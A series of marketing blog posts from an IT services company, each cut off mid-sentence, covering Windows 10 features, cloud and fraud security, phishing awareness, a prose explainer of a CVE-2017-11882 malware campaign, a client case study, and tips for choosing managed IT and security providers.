Over the years there have been many versions of Windows such as Windows 8, Windows Vista, and Windows XP. Windows 10, the latest update from Microsoft, has many unique features that distinguish it from its predecessors. While the previous versions ran mainly on laptops and desktops, Windows 10 is designed to run on tablets equally as well. One of the best features of this update, which is also known as Spring Creators Update, is that takes very little time to install – just under thirty minutes. While the previous updates used to take a lot of time, this new version is very time effective. Windows 10 has many other distinctive features that are very useful for many small businesses. Cortana on Desktop Windows 10 brings voice-controlled digital assistance in the form of Cortana to computers. Now you can interact with or give commands to your computer without lifting a finger. You don’t need to type – just tell your computer if you want to launch a PowerPoint presentation, need a specific file, or want to look at specific photos. Your PC can do all this while you work on, say, an interdepartmental email. Timeline Timeline has replaced the Task Viewer icon beside the Windows taskbar. This new feature allows the user to view the activity history of their desktop. If you are looking for a file that you were working on last week, Timeline will help you find it quickly. Just click on the Task View button on the taskbar, and you will be able to see all your open files and applications. It is a convenient way to see what applications are running. Windows will display photos, folders, and documents according to the date that they were last used. Privacy Another security feature of Windows 10 is the new Windows Diagnostic Data Viewer. This feature allows you to view the amount of information that Microsoft can access from your computer. You can keep your data safe by fine-tuning privacy settings which concern application usage, browser history, web permissions, and connected devices. The Start Menu is back! In the previous update the Start Menu was eliminated, but in Windows 10 we can see its revival. The bottom left shows the Start Button, and when you click on it, two panels appear side by side with the left side showing the most used applications. The right side displays a list of live tiles that you can resize, reorganize, and customize. There is a power button at the top similar to Windows 8 for features such as Standby, Hibernate, and Shut down. Nearby Sharing Another simple feature that makes office work so much easier is Nearby Sharing, which you can enable from the Control Panel. Select the computer you want to send the file to and then click on the Share button in the Photos app or the Edge browser. The computer will receive a notification asking it to accept or decline the file. This ensures that file transfers can happen without unreliable network folders, beat-up USB devices, or empty email messages. Snap Assist In this update, the Snap View feature has also been updated which allows users to open multiple windows side-by-side without being limited by your screen’s resolution. This feature also suggests different apps that you can open to fill the available space. Swift Pair This feature allows you to connect to a Bluetooth device within the desktop’s range. You will automatically receive notifications whenever there is a connection opportunity. With Windows 10 you can use wireless headphones to make a call or try out a wireless keyboard by just clicking connect. Microsoft Edge The new browser called Microsoft Edge has replaced the old Internet Explorer. This browser has many impressive features such as Cortana integration, which allows you to pull up contextual information without having to search through emails. It has an annotation tool which lets you write anything and share it with your friends on social networks without leaving the browser, and PDF support which makes reading easier by improving the layout of long articles. Tablet Mode Windows 10, unlike Windows 8, makes a clear differentiation between tablets and desktops. In Windows 8, if you happen to be using a mouse and keyboard, by default, you will be in desktop mode. Action Center The Action Center in Windows 10 has been expanded to allow easy access to frequently used settings such as tablet mode and Wi-Fi connectivity. It also shows all essential notifications as soon as your computer receives an update. Windows 10 has many impressive features which were missing in the previous update. It is faster, provides invaluable security protection and makes multitasking much easier. Update your computer today to enjoy all the benefits of this new operating system.

Moving to “the cloud” is good business sense – the cloud makes financial sense as opposed to the costly real estate involved with server expansion and never-ending data needs. But how can you protect yourself and your data in something you can’t see, touch, or control? “Change is scary.” It’s a phrase often uttered in response to big news that means change on the grand scale; something big is looming. The reference to change being “scary” really has to do with human nature and the fear of the unknown. But are we really afraid of the unknown? Or is this more to do with apprehension over something we don’t yet fully understand? You’ll pay a small fortune to a therapist to get the answers to all of those questions, but the bottom line really is just that change makes us nervous for all of those reasons. When the discussion turns to the cloud, this intangible and invisible “thing” that is ever-evolving and so adaptable that it’s seemingly different for everyone, our collective guard is up. The reality is that the cloud is only invisible to us – these storage servers do physically exist somewhere, using another entity’s real estate and power supply. Hired staff maintain and protect these servers on your behalf. The cloud is scalable based on your needs, meaning you can secure more or less storage space as your business needs change. Win-win-win, right? Yes and no. Myth: I’m paying someone else to store my data, so the burden of security is on them. Fact: It’s your data being stored in the cloud, so you still need to think about security. You have a duty to protect the information of customers and clients, and if there is a data breach or other cybersecurity vulnerability, there is still a liability. Myth: Cloud providers are super high-tech and impenetrable. Fact: Your data is stored on third-party servers and accessed via an Internet connection. Any reputable cloud solution provider employs incredibly strict security measures and keeps abreast of the latest cybersecurity news – so you don’t have to. That doesn’t mean, though, that you don’t need to worry about secure access and taking every precaution you can to prevent unauthorized access through a breach on your end. Myth: My cloud solution knows what they’re doing, so I don’t have to. Fact: You are paying an expert to provide you a service, but that doesn’t mean you don’t need to be aware or your team doesn’t need to be knowledgeable. More importantly, why would you not want to know how your cloud provider is protecting you – and your data. Would you be concerned if servers were stored in an unlocked and unguarded facility? What about if your data was backed up on hard drives that sat exposed to the elements or accessible to anyone? Or worse – if your data wasn’t being backed up at all? That’s like letting your staff keep passwords to their network or cloud access on a notepad on their desktop for the world to see! Don’t let human error be responsible for a breach – keep informed. Did you know that more than half of organizations, especially those classified as “small and medium businesses (SMBs)”, that experience a data loss, whether from cybersecurity breach or not – result in a catastrophic impact and aren’t able to recover? That means if there is a data breach, the odds aren’t in your favor to recover at all. The most important thing to remember is that a 100% cybersecurity guarantee isn’t possible, but that every business can take steps to make sure they’re protected, and so is their cloud service access. How can you make sure your data is secure? Establish a formal process with your team. Does each member of your team understand their responsibility as it relates to security measures? Maybe – but the only way to make sure every team member is taking every precaution is to define what measures are in place and what steps need to be taken to protect the brand, the organization, and its data. Ensure the formal process is part of the new team member onboarding so that all staff have the information and understand what is expected – including executives. Follow the latest security best practices. Is your network secure? If your IT staff is in-house, make sure there is a process for continuing education. If your organization outsources your managed processes, make sure your trusted partner is employing these same best practices and communicates needs with your organization timely and clearly. Are passwords complex? Do passwords contain a mix of uppercase and lowercase letters, plus numbers and symbols? Are passwords routinely changed? Passwords shouldn’t be reused in multiple locations, either, and should be unique to users. Is data backed up? As many as 20% of back-ups are incomplete or corrupt, and some systems are fundamentally flawed. If your organization backs-up your own data, even a fraction of your stored data, make sure it’s stored in a secured location with these same best practices above. Are desktop workstations, mobile access machines, and remote technology all equipped with the latest in active antivirus software? Proactivity and consistency. This is probably the most important part of any cybersecurity process. Does your organization provide ongoing training to team members to make sure security measures are kept updated and consistent? Operator error is the most common cause of a data breach! “An ounce of prevention is worth a pound of cure.” Never are these words truer than in the case of data security! Protecting your data is essentially protecting yourself from cybercriminals who seek to access your data for illicit gain. Proactive protective safeguards, consistently deployed, really will go the farthest in terms of protecting your organization’s future. Is the cloud right for you? You may not have a choice. Recent estimates show that costs and other factors will require organizations to use the cloud in some manner within the next five years

Most business owners are cognizant of the prevalence of fraud in the digital world today. According to Experian’s Global Fraud and Identity Report 2018, almost three-quarters of businesses believe fraud is a growing concern, and nearly two-thirds reported fraudulent losses over the past year. What is Fraud? Fraud occurs when an individuals’ payment information is used without their authorization. When hackers breach your network and access your customers’ or clients’ sensitive cardholder information, they have many opportunities to commit fraud numerous times. Anytime someone falsifies an identity and “tricks” a system into thinking the person making a purchase is someone other than who they actually are, this is considered to be fraud. Fraud is Pervasive in Today’s Digital World This is because the majority of business and consumer data remains vulnerable. As the value of digital information grows, so does the hacker’s motivation to develop methods to avoid detection from the latest technologies. The existing account setup process requires consumers to provide extensive amounts of personal information along with passwords and secret questions. And data breaches provide this information to cybercriminals. When this data is stolen, it’s often used for fraudulent activities. Fraud is a moving target just like the hackers. New tactics are evolving where criminals combine real and fake information to create new identities. Most business owners just don’t have a handle on this – and they lack confidence in their ability to protect their customers and their companies from fraud. One of the reasons for this is that their initiatives are mostly reactionary rather than proactive as many continue to use legacy cybersecurity technology rather than investing in new, more sophisticated data protection solutions. As a result, every month that goes by increases their vulnerability and exposure to data breaches and fraud. Fraud is an ever-present and growing risk For businesses in e-commerce, managing the risk of fraud is a delicate balancing act between providing an ease of use for customers vs. fraud protection. They struggle with mitigating fraud and providing a positive customer experience. Unfortunately, the customer experience wins out in most cases, and businesses are willing to risk fraudulent losses over losing customers to their competition. Ironically, they are setting their businesses up for reputational damage where they will end up losing customers anyway, fail to gain new ones, and possibly face financial penalties and litigation costs. The 2017 Cost of Data Breach Study from the Ponemon Institute, sponsored by IBM, puts the global average cost at $3.6 million, or $141 per data record. That’s a reduction in the average cost in 2016, but the average size of data breaches has increased. It’s also worth noting that the average cost of a data breach in the United States is much higher at $7.3 million. More than 50 percent of businesses say they still rely on passwords as their top form of authentication.1 And business leaders know that using passwords isn’t the most secure option. But customers are used to them, and business owners want to please them. They also complain that they lack the financial resources to adopt more advanced authentication methods when this would save them legal fees and penalties if/when their customers’ accounts are breached–not to mention their reputation and the future existence of their business. This, of course, is very shortsighted. How data breaches and fraud are connected Data breaches and fraud don’t usually occur at the same time and place. Cybercriminals won’t steal a customer’s information and turn around and use it for a purchase from the same business. So. it’s not easy for a business to detect when a breach occurs. Data breaches are typically detected by using specific security tools that monitor all payment activity. Merchants should follow PCI/DSS Standards to identify and prevent breaches and remain compliant. PCI-DSS audits will help you find vulnerabilities in your system and reveal inadequacies that must be eradicated. A successful case of fraud spreads like cancer If a hacker can get one password, they may have the keys to other password-protected accounts. The more online accounts people open, the greater their risk. And most people have quite a few. If the hacker can figure out the password to someone’s email account, they may also have the key to their credit card and banking accounts as well. You must remain vigilant to prevent data breaches and fraud. What to do if you suspect fraud A key indicator of evidence of fraud is in chargebacks where a customer disputes a charge on their credit card, and where you aren’t paid for the service or product. If your chargeback rate increases above a 1% margin, this is a good indication that you’re experiencing fraud. In this case, you should hire a third-party auditor like an IT Managed Services Provider (MSP) to help bring you back into compliance and stop the thieves. They will detect where the problem(s) exist and if what they find indicates a data breach. PCI-DSS compliance requirements mandate that you do this to stop the fraudulent activity. Of course, you should contact the card processor as well. They will connect you to the card providers who can often identify the point of access or detect a suspicious pattern of activity. What You Can Do to Reduce Fraud and Data Breaches. Use EMV Technology. EMV (Europay Mastercard Visa) is the global standard to authenticate payment cards. EMV technology can help you protect your business from fraud. It ensures the card is legitimate and that the person using the card is the authorized user. EMV chips are microprocessors that store and protect cardholder data. They use a unique cryptogram that’s validated by the card issuer. This makes it more difficult for hackers to break the code and steal card information to commit fraud. Today, if you don’t use an EMV-capable terminal, and the transaction turns out to be fraudulent, you can be held financially liable for that transaction. EMV has been used in the United Kingdom since 2004, and card-present fraud has gone down

Your cybersecurity practices shouldn’t be treated like a game of chance unless you are 300% certain you’re going to win. What can you do to make sure your business isn’t the ultimate loser? Is technology today the endless cycle of cat-and-mouse, with the bad guys always one step ahead? A quick search for “cybersecurity best practices” will yield millions of results, all with their ideas of what you can do – but does any of it make sense? Someone busy running a company faces a complex dichotomy: Being too busy running their company to worry about something that won’t directly generate revenue, but not giving enough time and attention to something that could directly impact revenue. Those are two very distinct and different thoughts, but still closely related. Not only is cybersecurity a critical focus of business today, but it’s also the easiest way to fail. Cybercriminals – hackers – are usually one step ahead of us good guys, but that’s the “cat and mouse” game to them. We respond to cybersecurity breaches that make the news with preventive measures to avoid the same fate and do our best to have enough safeguards in place to protect every element we can. Hackers seek a cybersecurity vulnerability to exploit to their advantage. Their reasons don’t matter – it’s the result that affects their victims. Why do we still have vulnerabilities when we know better? Myth: Half of small businesses think they’re “too small” for a hacker to target. Truth: Small businesses make easier targets for many reasons. They often don’t have the tech budgets that the Fortune 500 companies do in order to take every precautionary measure to avoid being hacked. Smartphones are major targets of hackers now, given more than half of all web traffic is reported to take place via mobile devices. Smartphones don’t have the same level of protection, making them easy targets, and therefore easy points of entry to a cybersecurity vulnerability. Imagine pressing a thumbtack into a hairline fracture on a porcelain plate – this one weak spot has the potential for this singular action to shatter the plate into thousands of pieces. Now, imagine this plate is your proprietary data, and this thumbtack is a hacker. Can you see the potential damage? Myth: Employees of small businesses know more about the company and are more invested in its success, therefore take the time to safeguard their actions. Truth: The dedication of staff to their employer has nothing to do with cybersecurity. Modern cybercriminals are targeting critical data: consumer information, accounts with intellectual property, financial information about both the company and consumers. Three out of every four small businesses have no formal cybersecurity policies or protocols in place for staff, nor training to discuss the latest threats and how to thwart them. Hackers know this – oh, yes, they know – and they also know the small business is less protected than those Fortune 500 companies. This is a lethal combination. Nearly two-thirds of small businesses have yet to address security regarding mobile devices or enact formal policies for mobile device use as it pertains to professional operations. Myth: Small businesses can bounce back faster after a breach. Truth: Half of all small businesses don’t have a disaster preparedness plan in place for recovery should they be impacted by a cybersecurity threat, a “data breach”. It’s reported that less than half of all small businesses back up their data weekly. Let that sink in. The data loss in the event of a hack could have catastrophic results for as many as half of all small businesses. In the event of a breach, companies of any size consider the data loss and downtime to have the greatest impact, followed by the revenue loss – but most of the time, the impact to a company’s reputation isn’t considered until already in clean-up mode. If you’re ready to win at “Tech Truth or Dare”, here are the new rules of the game: Do you know what needs to be protected? What data do you store? How is your data stored? What protective measures and security protocols are in place? Where are the “holes”? This last question is the most important, and it’s a smart decision to hire an expert to help you with this one. What formal policies need to be updated – or put in place? Every business needs an official cybersecurity policy. This policy should also be updated annually, at the minimum. Formalizing a policy can make sure everyone that has access to your data follows the same procedures and the strongest safeguards are in place. This should include: Password protocols Passwords should be unique, complex, and changed regularly System updates Check for the latest updates to all applications and security releases Privacy settings Verify that users have the most secure privacy settings on their desktop and laptop computers, and smartphones and mobile devices What is your plan for how to handle a disaster? Perhaps an extension of the previous question, but no less important is how to handle a hack or breach should one occur. You’ve taken all the necessary steps and precautions, but you still had a disaster – now what? Best practices include daily back-up of your critical resources – which you’ll need to identify – and then test the process to ensure it’s sufficient, just in case. Talk to experts. You are an authority in what you do, and your sales pitch to your customers focuses on your expertise. Why wouldn’t you hire experts to protect your business? Is your training sufficient? Make sure your staff is aware of the steps needed for Internet safety, email security, network threats, and how to detect and protect in the event of each. Equally important is what need to be done if something happens and they suspect a threat. Prevent your business from becoming a victim of a hacker this year and win the game! Make 2018 the year you have an ironclad cybersecurity program,

Sure, yoga teaches the flexibility that is key to adapting to your surroundings. But in practicing daily self-awareness, the saying “A team is only as good as its weakest player” is rarely truer than in the world of cybersecurity. How does your team stack up? Target knows. Sony knows. Ashley Madison definitely knows. That’s the bad thing – an organization may only realize how strong — or weak — their cybersecurity position is once there is a successful cyberattack. The nature of the attack doesn’t matter, nor does the overall effect. The damage is done, and the organization goes into clean-up mode. In the days immediately following, the phrase heard most is “How did this happen” when the real question should be “How can we prevent this from happening again”? Subtlety isn’t the goal of a hacker, nor is it their strongest attribute. The modus operandi of any hacker is singular: find a cybersecurity vulnerability and exploit to their advantage. The rest doesn’t matter. You likely disagree, but we think you’ll realize this is exactly the case. After all, we want to help you beef up your security and prevent a vulnerability rather than shift into defensive mode upon clean-up from an attack. The latter is going to shift your focus for up to a year of reactivity, while a little extra focus now will prolong your proactive position. An ounce of prevention is worth a pound of cure, especially in this type of situation. At the most basic level, your organization’s cybersecurity is based on your team’s awareness level – which can easily be assessed and addressed in training. Data breaches caused by hackers are one thing, but the simplest way for a hacker to gain access is by finding a weak link – a human operator – and using sneaky tricks to exploit weakness from that angle. A hacker can use pretty low-tech approaches in this way, like phishing. Does your cybersecurity awareness training still include exercises and tips on old-fashioned tricks like phishing? It’s amazing the simple tactics some of these hackers will resort to – but the reason is that these tricks still work on us. A 2017 study by Google reported that phishing was still one of the most effective tactics used for hacking a user account. Phishing is the practice of sending emails pretending to be from a reputable company, like Google or Apple, to get recipients to reveal personal information like passwords to the sender. Perhaps it’s because we don’t see ourselves as targets anymore, thinking hackers only target the “big fish” for the bigger reward – a unique tactic called “whaling” – but the reality is that everyone is a target There are no exceptions. Any computer user can be an access point for a cyberattacker because any computer can serve a greater purpose for a cybercriminal. Why does phishing still work? Because we let it. We start to shift our focus to the newer or more sophisticated methods hackers use, and we don’t maintain vigilance on the basic approaches in cybersecurity awareness training. One click is sometimes all it takes to turn a user into a victim – and for a hacker to wreak havoc on a network. One click can lead to a malware installation, identity theft, or worse, ransomware. That click could cost an organization into the millions of dollars. Ransomware is like a virus, where a hacker accesses a computer or network and places a file or code that blocks user access, and requires the user to pay money – a ransom – to the cyberattacker to regain access to the computer or network. Remember when we said all it takes is one click? It’s true. In 2017, hackers sent emails to staff at Chipotle and managed to trick someone into one click, compromising the point-of-sale (POS) machines at locations that enabled the hackers to gain access to the credit card data of millions of customers. The worst part is that even end users who are in the tech industry have been tricked; Google and Facebook have both been affected to the tune of $100 million each because of successful phishing attempts. Did you know that some companies hire former (“rehabilitated”) cybercriminals as cybersecurity specialists – true experts – to help mold technology teams in charge of cybersecurity and oversee cybersecurity awareness training programs? These are probably among the most solid and effective programs in existence! One way organizations have used to test the awareness of their team is by executing an internal phishing campaign. This is a campaign where the company has total control of the phishing attempt but tests the staff to see where the weaknesses are. The results only help improve overall training and cybersecurity. This approach is wildly successful in getting an accurate picture of your team’s awareness. Who fails the test? How far will some employees allow a hacker to get before realizing they are being phished? Where does your training lack focus that the attempt was successful? A few things to keep in mind with this approach: While internal phishing campaigns are helpful, don’t shift your training focus to only weaknesses discovered in this process. Be careful not to call out any one particular team member or access point; the goal isn’t to embarrass team members but to improve your team’s awareness overall. Don’t aim for only those team members you consider to be the weakest when it comes to cybersecurity knowledge; you’d be surprised at where an organization may discover vulnerabilities On this note, it’s helpful to provide one-on-one level training catering to these team members, but you can still do so as a company by offering exercises aimed at specific weaknesses without placing blame. Keep the phishing exercise as realistic as possible, so the teachable moments that result are valid and credible When your exercises and training give you enough insight to update your training, keep the training outline simple with a few target areas that are comprehensive enough

You May Be Sabotaging Yourself! This latest cyber-attack uses Windows Installer to download malware onto your computers. What is CVE-2017-11882, and what does it do? How should you detect and protect against it? What other similar malware attacks have come up in the past? These are all questions you should be asking yourself in order to develop the best defense against this type of attack. It seems like just when we’ve learned how to protect against one type of malware, four others pop up. Recently, Microsoft began combating CVE-2017-11882, which exploited a vulnerability in Microsoft Office. Then, just as expected, as one weakness was fought, a new one popped up. CVE-2017-11882 exploited a new vulnerability within the Windows Installer. The previous version of CVE-2017-11882 The previous version would exploit the vulnerability using windows executable msht.exe, and then run a PowerShell script which would download and execute the payload. The problem with this is that while previous versions have edited Microsoft Installer, this version doesn’t edit it. What it actually does is use Microsoft Installer for the exact purpose that it was built for, to install things. Only this time it forces it to install malicious programs on your computer. The new attack uses msiexec.exe as part of the Windows Installer service. For example, the user could receive an email with an attachment. Since the attachment seems legitimate, the user opens and begins downloading it. This attachment installs a malicious MSI package through the use of CVE-2017-11882. This then, in turn, releases either an MSIL or a Delphi binary. This binary will then launch another instance of itself. This duplicate binary is then hollowed out to create a new home for the new malware payload. How does CVE-2017-11882 go undetected? This package provides a compression layer that file scan engines need to process and enumerate in order to detect the file as malicious. This is similar to movies where the complicated retina scan needs is needed to gain access to a specific area of the building, yet the spy is still able to get in, due to his fancy contact lens. The system scans the lens and thinks that he is an authorized user, and allows him passage. Similarly, because of this compressed file mask of sorts, it’s hard to detect and identify the actual payload since it is contained in the heavily obfuscated MSIL or Delphi binary. What can we do to protect against CVE-2017-11882? Sometimes there are simple solutions to significant problems. For example, one of the easiest ways in which you can defend yourself and your business from CVE-2017-11882 is by having a strong email policy for your company. You should use strong passwords, with both capital and lowercase letters, as well as some symbols. You should never write passwords down, or use the same password for multiple accounts. Doing so can result in a hacker not only having access to your email but also to any and all accounts. Also, you should change your passwords often; it is recommended to change them every two months. This way you can stay ahead of the hackers before they have an opportunity to figure out your password, you will have already changed it. Email and Passwords Besides password strength, you should also focus on training employees about the dangers of email attacks, such as those that use the Microsoft Installer. It’s vital that they are trained not to click or open any suspicious emails. For example, employees should be trained to recognize phishing emails that may carry malware, and also to know how to isolate and flag these emails. This way other employees are immediately notified of the email, and won’t themselves fall victim. Employees should always check emails and names of unknown senders to ensure they are legitimate. They should always look for inconsistencies or style red flags such as grammar mistakes, capital letters, or excessive use of punctuation. Restrict or disable Windows Installer A second way to protect yourself is by limiting or completely disabling the Windows Installer itself. This would prevent potential attackers from being able to install their malicious software on your user’s systems. This way, only the system administrator could install programs. Controlling the access and spread of these attacks can significantly help your company to protect itself. Rather than trying to put out fires all over the place, you can then focus on one area and defend it appropriately. Microsoft Recommendations Microsoft recommends that if you think that you are infected with this malware, you should use your security software to detect and remove the threat. Remember to use appropriate software based on which operating system you are using. Microsoft states that Windows Defender works best for Windows 10 to detect and remove this malware. Microsoft Security Essentials works for Windows 7 and Windows Vista and has the appropriate defense and removal for this malware. After detection and removal, you should update your software to further protect yourself from future exploits. Similar previous attacks Attacks like this are not rare in the least. For example, in November of 2017, there was also a vulnerability in Microsoft Office 2000. This flaw allowed hackers to install malware without user interaction. So, while you were just writing a report in Microsoft Word, hackers were downloading malicious malware into your computer without your knowledge or permission. This could easily be fixed by updating software, such as using only the most recent form of Microsoft Office, so that your computers and networks are protected against the latest of threats. We should stay vigilant, to protect our network and our businesses. Knowing what is out there and what can wreak havoc on your business is half the battle. The other half is updating your staff and your software to ensure that you are providing the most vigorous defense possible. Look for vulnerabilities in your system and business. Additionally, it is crucial to stay up to date with the latest cyber-attack news. This will keep you in the know as

Sunair Awnings & Solar Screens protects their customers from the sun and rain, and they’ve been doing so since 1880. They lead the industry with the highest quality, most innovative custom-made retractable awnings and shade systems. In fact, Sunair was the first company to introduce the European-style retractable awning to the North American Market. Hammett Technologies has been Sunair’s IT Consultant for the past 11 years. Previously, Vice President of Sales, Jim Wills, acted as their in-house IT guy and admits he wasn’t very good at it. The Situation: Sunair Needed an IT Consultant Who Was Knowledgeable and Capable. Previously, Sunair used a slew of other IT providers, but none of them delivered the service they required. An essential requirement was that their IT Consultant understood their business and implemented technology based on their unique needs. “We were outsourcing our needs one by one at first, and worked with several different IT services,” says Jim Wills, Vice President of Sales at Sunair. “We didn’t have a CTO or CIO, and while my knowledge was good, our needs very quickly exceeded my technical expertise.” After working with so many other providers, Sunair knew they needed an IT Partner who would put their needs first and integrate technology that was right for their growing business. “We quickly realized how different Hammett was from other IT providers. Hammett Technologies is so focused on our needs that they are like an extension of our company, rather than an outside provider,” says Wills. The Solution: Hammett Technologies Provides the Right Guidance and Saves Sunair Money. Hammett Technologies met all of Sunair’s technology needs and more. Our experts focus on providing specialized IT services that transform as a company grows. Along with a helpdesk, IT management, and support, we act as Sunair’s CIO, CISO, and CTO. As a result, we’ve saved them a great deal of money. Jim from Sunair went on to say, “Hammett’s current projects are very exciting and will contribute to our bottom line, providing more for us than they will cost. They’re installing and implementing a VOIP system which will give us a great return and the ability to provide excellent customer service. Now we can balance customer support calls between our two plants. This will help us provide the level of service our customers deserve without having to hire additional staff”. In 2017, our IT Consultants helped Sunair save between $15,000 and $20,000 by evaluating their current systems rather than letting them purchase vendor-recommended hardware. We also helped Sunair save on staff and in-house IT services. “Hammett implemented a CRM system for us,” continues Wills. “This allows all members of our sales and service team to access customer information and track all the transactions that occurred over time. Now, they can retrieve this information immediately.” The Outcome: Hammet Streamlined Sunair’s Operations While Improving Their Bottom Line. Our IT Consultants successfully lowered costs for Sunair by recommending and implementing the right technologies. Jim raves about our team: “Hammett acts as an extension of Sunair, not as an independent contractor trying to extract revenue. They help us keep costs low while keeping our customers happy. They also treat our ‘wallet’ as their own – the amount we spend on Hammett’s services is a fraction of what we would spend with other companies”. Sunair Awnings and Solar Screens experienced what we do for all our clients. We work to cut costs while delivering exemplary service that is far above what other IT companies provide. Hammett Technologies will ensure you realize the true value of your information technology. Call us at (443) 216-9999 or send us an email: info@hammett-tech.com. We’ll address your unique IT requirements while saving you money.

There are plenty of options when it comes to finding a Managed IT Services provider for your business – how can you tell which is the right choice for you? These days, business owners are searching for every advantage to put their company on top. With so much competition out there, just a few small issues here and there can result in costly slow-downs to daily work. One of these resides in your IT department. Nothing is more frustrating than broken computers, slow internet service, and expensive service calls. Things like this can ruin your week and take a huge chunk out of the budget. Though there’s no way to stop computer and network problems from happening, there are ways to minimize your exposure. For small and mid-sized businesses, the solution is Managed IT Services. With Managed IT Services, you can forget about setting up an expensive Server Room and hiring a bunch of highly trained IT people. You’ll probably only need a handful of IT people on staff to handle simple issues that crop up in day-to-day business. The problem comes with the fact that there are so many IT service providers these days and so it can be difficult to find the one that works best for your company. To help, check out these five timely tips to help you find the right IT service provider so you can get back to the job of running your company. Tip One: The Budget Although having the best IT support for your company is important, sometimes managed service providers are keen on trying to sell you expensive services that you really don’t need. To avoid this scenario, sit down with your on-staff IT people and talk about exactly what services your company needs to stay up and running. Speak to your accountant and make sure about the monthly amount that will fit comfortably into your budget. All companies are nervous about data breaches these days; they can be expensive and stressful. However, don’t let that push you to buy over-priced services that you really can’t afford and don’t need. For some companies, hiring a consultant to advise you is a good solution. Tip Two: Understand Your Contract Too many business owners get locked into long-term contracts that they can’t afford. Make sure you understand exactly what your contract includes. How often can you call for service? Some companies allow unlimited service calls for just a few extra dollars per month. This can be a good way to go if your computer equipment is getting old and might break down more often than new equipment. Another issue is whether the contract includes regular updates to software and hardware. One of the biggest issues that companies face is the evolution of technology. Every year, technological capabilities develop at phenomenal rates; it’s hard to keep up. There are new devices, gadgets and social media sites that demand faster computers and networks. Managed IT Services should keep you up to date with the latest advances in business technology. Tip Three: Stay Proactive The whole point of Managed IT Services is that you have someone else to handle network and computer problems. As with all service providers, some are just better at their jobs than others. Make sure your Managed IT Services provider believes in staying proactive. Avoid providers who only come out when there’s a problem. You need a company that will stay on top of all the latest threats. One data breach could drive you into bankruptcy, so it’s important for your IT support provider to make sure your computers are ready for whatever may come. Often, you can find out about things like this by reading online reviews of the company. Have they had any complaints filed against them? How long have they been in business? Don’t let a fast-talking salesman sell you on a company with two employees that just opened its doors. Find someone that has a great reputation and has been in business for years. You want to work with providers who will stand behind their services and won’t stop until you’re satisfied. Tip Four: Is it Scalable? Hopefully, your business is growing. What will happen if you need to add five new computers? IT services should grow as your company grows. You don’t need to understand all the intricacies of cost optimization, cloud services, and scalability, but you should know what it will cost in terms of money and time when your company begins to grow. Ask intelligent questions about colocation and virtual infrastructures. Many business owners are not well versed on these topics but your company’s IT professionals should be. You need IT people you can count on; not people who try to dazzle you with big words. Your on-staff IT team should be working proactively each day to ensure ongoing network services and a sound infrastructure. Hire the best people you can afford and expect them to do their jobs. Tip Five: Ask the Right Questions In the world of Information Technology, there’s quite a bit that the average business owner doesn’t know about. For instance, will the Managed IT Services provider perform regular security updates and patch management? These are both crucial to preventing cyber breaches. Will they perform network monitoring and send alerts when something looks out of order? A new service provider should begin your professional relationship by performing a vulnerability and risk assessment. This will tell you whether your software and hardware are up to par. Is your equipment set up to handle the massive number of new cyber threats that are hurled at businesses each year? How many times have you waited all day for a service provider to show up? This is stressful and costly for any business owner. Ask if the IT provider has a guaranteed response time. It can also be very helpful to have 24/7 Helpdesk support. Be sure this is included in your contract. Many managed IT providers also offer additional services that can be

Learn the seven key questions every business should ask when deciding on which Managed Security Service Provider to hire. A Managed Security Service Provider is an extension of your IT services department that focuses solely on the security of your company. The services that a Managed Security Service Provider provides range on the network security management spectrum from virus and spam blocking, to intrusion detection, firewalls, and virtual private network (VPN) management. Additionally, some Managed Security Service Providers offer other features such as system changes, modifications, and upgrades. When your company’s security is on the line, it is incredibly important to fully evaluate your options for Managed Security Service Provider. To help make this decision, here are seven questions every business should ask when deciding on which Managed Security Service Providers to hire. What Is Their Reputation? Checking the reputation and reviews of a business doesn’t only apply to restaurants, but it is also essential when hiring a Managed Security Service Provider. Roger Smith, Amazon #1 Best Selling Author, Experienced Cybercrime and CyberSecurity Expert, Speaker, and Trainer, explains that that reputation is critical in deciding whether to hire a Managed Security Service Provider. Smith goes on to further clarify that “Making a bad decision or deciding on one provider based solely on cost can cripple your business”. What Can The Managed Security Service Provider Do For Your Business? Before you hire a Managed Security Service Provider, you need to know what they do, and what they can do for your business. You can evaluate their features by looking into four key categories: Technology, Management, Adaptability, and Compliance. A Managed Security Service Provider typically offers businesses technology such as firewalls, wireless solutions, VPNs and patch management. Managed Security Service Providers are responsible for managing policies, risks, procedures, processes, auditing, reports, training, and education. Managed Security Service Providers should be able to adapt to your business needs under any circumstance. For example, Managed Security Service Providers should offer disaster recovery, business continuity, and backup storage and protection as well. Knowing each feature, and its importance to your company allows you to better evaluate which Managed Security Service Provider will work best for you. John Penland, the founder of InfoTech, states that “In order to provide exceptional value, a provider must first understand their customer’s business model. This helps providers develop a rock-solid solution that can create a long-lasting, happy customer”. Do They Have The Expertise? Not all Managed Security Service Providers are the same. While they might all roughly do the same work, it doesn’t mean that they will all fit well with your company. For example, a Managed Security Service Provider that works for a healthcare business might not be as successful for an accounting business. There are differences in timelines, terms, and expertise that can affect their successful integration into your business. Ian Trump, an ITIL Certified Information Technology Consultant with 20 years’ experience, explains that “When evaluating the Managed Security Service Provider, you need to know whether they have some experience in your particular vertical. A Managed Security Service Provider that specializes in healthcare services may not be a good fit for a logistics and transport or manufacturing company”. Do They Have The Capability? You need to be sure of what you need from your Managed Security Service Provider, then cross-reference that to ensure that they are capable of providing those services to you. Brian Laing, an IT Security innovator from Lastline, states that “The key to evaluating a Managed Security Service Provider is to first codify your requirements”. Splitting these into different requirements not only simplifies which Managed Security Service Provider might be better, but it can also completely remove a vendor from the selection process. This will save your business valuable money and time. What Are They Going To Change To Make Your Life Easier? Hiring a Managed Security Service Provider should make running your business smoother. When hiring and evaluating your Managed Security Service Provider, ensure that you are firm on nonnegotiable expectations of service. Ian Trump further iterates the importance of a mutually beneficial relationship by explaining that “When contracting the services, I would approach negotiations as a partnership and use language which provides mutual benefit, measurable deliverables, service level agreements (on both sides), and dispute resolution mechanisms”. What Benefits Are You Going To Get Out Of It If You Partner With Them? It is essential to create a specific service level agreement with your chosen Managed Security Service Provider. This ensures that all parties involved understand the requirements on both sides – recognizing this as a mutual relationship is key. They are there to protect your company, data, customers, and staff and you are there to pay them. Just as you wouldn’t hire an employee to sit on Facebook all day, you shouldn’t hire a Managed Security Service Provider that won’t carry their own weight. How Much Will It Cost? Outsourcing to a Managed Security Service Provider can save your business 60-75%. Managed Security Service Providers cost on average about $75,000 a year. While this sounds hefty, you can compare it to the cost of a small IT department doing the same amount of work. Three IT staff, with a salary of $72,000 annually plus the cost of cybersecurity software, hardware, and equipment can easily run you upwards of $300,000. Additionally, the use of a Managed Security Service Provider saves you money by providing your business with critical 